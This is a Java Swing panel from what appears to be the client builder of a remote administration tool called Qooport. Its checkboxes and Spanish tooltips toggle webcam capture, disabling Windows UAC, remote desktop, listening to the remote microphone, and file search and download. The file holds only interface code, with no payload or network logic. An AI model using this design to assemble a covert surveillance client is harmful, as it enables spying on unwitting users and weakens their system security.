/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package qooport.avanzado.crearcliente;

import java.awt.Font;
import javax.swing.JCheckBox;
import static qooport.avanzado.QoopoRT.tipoLetra;
import qooport.utilidades.Util;

/**
 *
 * @author alberto
 */
public class FuncionesPanel extends javax.swing.JPanel {

    /**
     * Creates new form conexion
     */
    public FuncionesPanel() {
        initComponents();
        lblTitulo.setIcon(Util.cargarIcono16("/resources/grid16.png"));

        this.jLabel1.setFont(new Font(tipoLetra, 1, 11));
        this.jLabel3.setFont(new Font(tipoLetra, 1, 11));

        fn_capturaCamara.setFont(new Font(tipoLetra, 1, 11));
        this.fn_capturaCamara.setText("Captura cámara");
        this.fn_capturaCamara.setToolTipText("Permite la captura de la cámara");
        this.fn_capturaCamara.setSelected(true);

        this.fn_desUAC.setFont(new Font(tipoLetra, 1, 11));
        this.fn_desUAC.setText("Deshabilitar UAC");
        this.fn_desUAC.setToolTipText("Desactiva el control de usuario en windows");
        this.fn_desUAC.setSelected(false);

        this.fn_Ventana.setFont(new Font(tipoLetra, 1, 11));
        this.fn_Ventana.setText("Mostrar Ventana");
        this.fn_Ventana.setToolTipText("Muestra una ventana de informacion");
        this.fn_Ventana.setSelected(false);

        this.fn_escritorioRemoto.setFont(new Font(tipoLetra, 1, 11));
        this.fn_escritorioRemoto.setText("Escritorio Remoto");
        this.fn_escritorioRemoto.setToolTipText("Permite el control y visualización del escritorio remoto");
        this.fn_escritorioRemoto.setSelected(true);

        this.fn_capturaAudio.setFont(new Font(tipoLetra, 1, 11));
        this.fn_capturaAudio.setText("Audio");
        this.fn_capturaAudio.setToolTipText("Permite la comunicación Voz IP. Permite escuchar el microfono remoto");
        this.fn_capturaAudio.setSelected(true);

        this.fn_buscarArchivos.setFont(new Font(tipoLetra, 1, 11));
        this.fn_buscarArchivos.setText("Buscar Archivos");
        this.fn_buscarArchivos.setToolTipText("Permite la búsqueda de archivos");
        this.fn_buscarArchivos.setSelected(true);

        this.fn_descargararchivos.setFont(new Font(tipoLetra, 1, 11));
        this.fn_descargararchivos.setText("Descargar Archivos");
        this.fn_descargararchivos.setToolTipText("Permite la descarga de archivos. La subida es obligatoria para poder actualizar el cliente en un futuro.");
        this.fn_descargararchivos.setSelected(true);

    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        jLabel1 = new javax.swing.JLabel();
        lblTitulo = new javax.swing.JLabel();
        jSeparator1 = new javax.swing.JSeparator();
        jLabel3 = new javax.swing.JLabel();
        fn_escritorioRemoto = new javax.swing.JCheckBox();
        fn_capturaCamara = new javax.swing.JCheckBox();
        fn_desUAC = new javax.swing.JCheckBox();
        fn_capturaAudio = new javax.swing.JCheckBox();
        fn_buscarArchivos = new javax.swing.JCheckBox();
        fn_descargararchivos = new javax.swing.JCheckBox();
        fn_Ventana = new javax.swing.JCheckBox();

        jLabel1.setText("jLabel1");

        lblTitulo.setFont(new java.awt.Font("Dialog", 0, 14)); // NOI18N
        lblTitulo.setText("Habilidades");

        jLabel3.setText("Habilita o deshabilita las funciones del cliente. aumenta o reduce su tamaño");

        fn_escritorioRemoto.setText("Escritorio Remoto");

        fn_capturaCamara.setText("Cámara Remota");

        fn_desUAC.setText("Deshabilitar UAC");

        fn_capturaAudio.setText("VoIP");

        fn_buscarArchivos.setText("Buscar Archivo");

        fn_descargararchivos.setText("Descargar Archivo");

        fn_Ventana.setText("Mostrar Ventana");

        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this);
        this.setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(layout.createSequentialGroup()
                        .addComponent(lblTitulo, javax.swing.GroupLayout.DEFAULT_SIZE, 224, Short.MAX_VALUE)
                        .addGap(305, 305, 305))
                    .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup()
                        .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING)
                            .addComponent(jLabel3, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
                            .addComponent(jSeparator1))
                        .addContainerGap())
                    .addGroup(layout.createSequentialGroup()
                        .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                            .addComponent(fn_Ventana)
                            .addGroup(layout.createSequentialGroup()
                                .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                                    .addComponent(fn_escritorioRemoto)
                                    .addComponent(fn_desUAC)
                                    .addComponent(fn_buscarArchivos))
                                .addGap(144, 144, 144)
                                .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
                                    .addComponent(fn_descargararchivos)
                                    .addComponent(fn_capturaAudio)
                                    .addComponent(fn_capturaCamara))))
                        .addGap(0, 0, Short.MAX_VALUE))))
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(layout.createSequentialGroup()
                .addContainerGap()
                .addComponent(lblTitulo)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jSeparator1, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jLabel3)
                .addGap(26, 26, 26)
                .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(fn_escritorioRemoto)
                    .addComponent(fn_capturaCamara))
                .addGap(18, 18, 18)
                .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(fn_desUAC)
                    .addComponent(fn_capturaAudio))
                .addGap(18, 18, 18)
                .addGroup(layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(fn_buscarArchivos)
                    .addComponent(fn_descargararchivos))
                .addGap(18, 18, 18)
                .addComponent(fn_Ventana)
                .addContainerGap(114, Short.MAX_VALUE))
        );
    }// </editor-fold>//GEN-END:initComponents


    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JCheckBox fn_Ventana;
    private javax.swing.JCheckBox fn_buscarArchivos;
    private javax.swing.JCheckBox fn_capturaAudio;
    private javax.swing.JCheckBox fn_capturaCamara;
    private javax.swing.JCheckBox fn_desUAC;
    private javax.swing.JCheckBox fn_descargararchivos;
    private javax.swing.JCheckBox fn_escritorioRemoto;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JLabel jLabel3;
    private javax.swing.JSeparator jSeparator1;
    private javax.swing.JLabel lblTitulo;
    // End of variables declaration//GEN-END:variables

    public JCheckBox getFn_Ventana() {
        return fn_Ventana;
    }

    public void setFn_Ventana(JCheckBox fn_Ventana) {
        this.fn_Ventana = fn_Ventana;
    }

    public JCheckBox getFn_buscarArchivos() {
        return fn_buscarArchivos;
    }

    public void setFn_buscarArchivos(JCheckBox fn_buscarArchivos) {
        this.fn_buscarArchivos = fn_buscarArchivos;
    }

    public JCheckBox getFn_capturaAudio() {
        return fn_capturaAudio;
    }

    public void setFn_capturaAudio(JCheckBox fn_capturaAudio) {
        this.fn_capturaAudio = fn_capturaAudio;
    }

    public JCheckBox getFn_capturaCamara() {
        return fn_capturaCamara;
    }

    public void setFn_capturaCamara(JCheckBox fn_capturaCamara) {
        this.fn_capturaCamara = fn_capturaCamara;
    }

    public JCheckBox getFn_desUAC() {
        return fn_desUAC;
    }

    public void setFn_desUAC(JCheckBox fn_desUAC) {
        this.fn_desUAC = fn_desUAC;
    }

    public JCheckBox getFn_descargararchivos() {
        return fn_descargararchivos;
    }

    public void setFn_descargararchivos(JCheckBox fn_descargararchivos) {
        this.fn_descargararchivos = fn_descargararchivos;
    }

    public JCheckBox getFn_escritorioRemoto() {
        return fn_escritorioRemoto;
    }

    public void setFn_escritorioRemoto(JCheckBox fn_escritorioRemoto) {
        this.fn_escritorioRemoto = fn_escritorioRemoto;
    }

}
